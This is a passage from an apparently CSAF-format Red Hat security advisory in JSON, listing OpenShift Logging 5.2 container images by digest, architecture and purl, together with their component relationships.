"openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.2.4-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.2.4-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-67" } } }, { "category": "product_version", "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "product": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "product_identification_helper": { "purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-44" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-47" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "product": { "name": 
"openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-66" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "product_id": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-64" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "product_id": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-71" } } }, { "category": "product_version", "name": 
"openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "product_id": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-74" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.2.4-4" } } }, { "category": "product_version", "name": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "product": { "name": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "product_identification_helper": { "purl": 
"pkg:oci/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.2.4-17" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.2.4-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "product": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.2.4-17" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "product": { "name": 
"openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-67" } } }, { "category": "product_version", "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "product": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "product_identification_helper": { "purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-44" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-47" } } }, { 
"category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-66" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "product_id": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-64" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "product_id": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "product_identification_helper": { "purl": 
"pkg:oci/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-71" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "product_id": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-74" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64" }, "product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x as a component of OpenShift Logging 5.2", "product_id": 
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64 as a component of OpenShift Logging 5.2", "product_id": 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64" }, "product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le" }, "product_reference": 
"openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "relates_to_product_reference": 
"8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le as a component of 
OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64" }, "product_reference": 
"openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": 
